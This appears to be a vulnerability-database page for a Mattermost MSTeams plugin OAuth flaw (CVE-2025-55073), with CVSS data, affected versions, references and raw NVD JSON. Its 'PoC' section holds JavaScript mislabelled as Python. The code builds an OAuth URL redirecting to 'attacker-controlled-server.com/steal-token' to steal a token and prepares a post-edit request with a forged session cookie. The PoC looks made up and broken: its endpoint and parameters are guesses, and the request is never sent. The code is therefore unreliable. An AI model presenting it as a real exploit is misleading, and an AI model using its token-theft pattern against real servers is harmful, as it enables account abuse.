CVE-2025-55073

Description

Mattermost versions 10.11.x <= 10.11.3, 10.5.x <= 10.5.11, 10.12.x <= 10.12.0 fail to validate the relationship between the post being updated and the MSTeams plugin OAuth flow which allows an attacker to edit arbitrary posts via a crafted MSTeams plugin OAuth redirect URL.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE

Mattermost 10.11.x <= 10.11.3

Mattermost 10.5.x <= 10.5.11

Mattermost 10.12.x <= 10.12.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-55073 PoC - Mattermost MSTeams Plugin OAuth Redirect Post Edit // This PoC demonstrates the OAuth redirect vulnerability for arbitrary post editing const https = require('https'); // Configuration const TARGET_HOST = 'mattermost.example.com'; const ATTACKER_SERVER = 'attacker-controlled-server.com'; const TARGET_POST_ID = 'target-post-id-to-edit'; const TARGET_CHANNEL_ID = 'target-channel-id'; // Malicious OAuth redirect URL construction function constructMaliciousRedirectUrl() { const baseUrl = `https://${TARGET_HOST}/plugins/com.mattermost.msteams-webhook/oauth/callback`; const params = new URLSearchParams({ // OAuth state parameter (could be stolen or manipulated) state: 'malicious_state_token', // Target post information embedded in redirect post_id: TARGET_POST_ID, channel_id: TARGET_CHANNEL_ID, // Malicious callback to exfiltrate data redirect_uri: `https://${ATTACKER_SERVER}/steal-token`, // Message content to inject message: 'Malicious content injected via OAuth redirect' }); return `${baseUrl}?${params.toString()}`; } // Trigger the attack by sending the malicious URL to victim async function sendMaliciousLink(victimEmail) { const maliciousUrl = constructMaliciousRedirectUrl(); // In real attack, this would be sent via email, message, etc. console.log('[+] Malicious OAuth URL generated:'); console.log(maliciousUrl); console.log('[+] Send this link to victim with edit permissions'); // Simulate the attack request const options = { hostname: TARGET_HOST, path: `/api/v4/posts/${TARGET_POST_ID}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Cookie': 'MMAUTHTOKEN=exploited_session_token' } }; const postData = JSON.stringify({ id: TARGET_POST_ID, message: 'COMPROMISED: Arbitrary post edited via OAuth redirect' }); console.log('[+] Sending malicious post edit request...'); return maliciousUrl; } // Execute PoC sendMaliciousLink('[email protected]'); // Mitigation: Validate OAuth state and enforce post ownership checks // Recommended fix: Implement CSRF tokens and validate post ownership in OAuth callbacks

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-55073
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-55073
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-55073/
[4] VulDB https://vuldb.com/cve/CVE-2025-55073
[5] https://mattermost.com/security-updates

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-55073", "sourceIdentifier": "[email protected]", "published": "2025-11-14T08:15:45.687", "lastModified": "2025-11-19T21:44:28.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.11.x <= 10.11.3, 10.5.x <= 10.5.11, 10.12.x <= 10.12.0 fail to validate the relationship between the post being updated and the MSTeams plugin OAuth flow which allows an attacker to edit arbitrary posts via a crafted MSTeams plugin OAuth redirect URL."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0", "versionEndExcluding": "10.5.12", "matchCriteriaId": "CCE1652A-13F7-4934-9F90-28129BAEE240"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.4", "matchCriteriaId": "2A1F41DC-D93D-48A7-8A3B-623C3344E979"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.12.0", "versionEndExcluding": "10.12.1", "matchCriteriaId": "E21DF5C5-280A-48C5-96C7-C78F0ECF32A3"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}